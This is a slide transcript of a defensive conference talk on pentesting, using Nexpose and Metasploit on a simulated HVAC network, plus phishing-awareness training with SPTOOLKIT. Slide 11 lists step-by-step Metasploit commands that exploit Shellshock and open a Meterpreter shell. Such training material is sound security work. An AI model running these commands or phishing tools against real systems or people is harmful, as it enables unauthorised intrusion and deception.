Presentation is loading. Please wait.

Presentation is loading. Please wait.

ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior.

Similar presentations


Presentation on theme: "ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior."— Presentation transcript:

1 ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior Information Security Analyst

2 Personal Life / Interests Married Bachelor’s in Music Business??? Favorite Show: Seinfeld Favorite Movie(s): Lord of the Rings / Hobbit Trilogy Favorite Aspects of IT Security: Reverse Engineering / Studying Shellcode Finding and Exploiting Software Vulnerabilties ABOUT ME

3 What is a pentest? A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? You are the attacker: You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan LET’S TALK ABOUT PENTESTING

4 Some history on Pentesting… Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? A Vulnerability Scan merely lays out the foundation for your network risk assessment A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities LET’S TALK ABOUT PENTESTING

5 Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) Other recommendations: Tenable Nessus Open Source: OpenVAS Why Rapid7? Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software Scanner and Pentesting software both free to try Software Resources Used: Nexpose Vulnerability Scan Solution Metasploit Pentesting Solution CONDUCTING YOUR FIRST PENTEST

6 Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network Attack Vectors used: Client Side and Web A Blind Scan? A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario HVAC Network Layout: HVAC A: Windows XP for server HVAC software: HVAC B: Linux Web Server for HVAC Web Services HVAC SYSTEM SCAN & PENTEST SIMULATION

7 HVAC SERVER A: SCAN SIMULATION Vulnerability Scan Results using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

8 HVAC SERVER A: PENTEST SIMULATION Pentest Live Demo using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

9 HVAC SERVER B: SCAN SIMULATION Vulnerability Scan Results using HVAC B: IP: OS: Linux HVAC WEB SERVER Shellshock!!!!!!

10 HVAC SERVER B: PENTEST SIMULATION Pentest Live Demo using HVAC B: IP: OS: Linux HVAC WEB SERVER

11 PENTEST SHELL COMMANDS USED Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… “use exploit/multi/http/apache_mod_cgi_bash_env_exec” “set RHOST ” (our victim box ip address) “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell

12 Why have User Awareness Training? Users can be more mindful of simple operations that can effectively help keep their documents and data safe We simply cannot monitor all of our users’ actions Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing directed to an unsuspecting, un-training user On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING MODULES

13 How does it work? Phishing Modules use pre-made templates that resemble common Phishing s in the wild s can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing What tools do I need? Easiest solution and what we will be using: SPTOOLKIT SPTOOLKIT is Opensource and requires little effort to setup Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES

14 Demo time! Link: https://github.com/sptoolkit/sptoolkithttps://github.com/sptoolkit/sptoolkit Requirements: SMTP server Any Linux OS box with Apache and MySQL installed Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default Commands to start MYSQL and Apache: Service apache2 start Service mysql start USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT

15

16 THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded by using the following link: (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: -> download Community edition of Metasploit and Nexpose -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an at:

17 QUESTIONS???


Download ppt "ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior."

Similar presentations


Ads by Google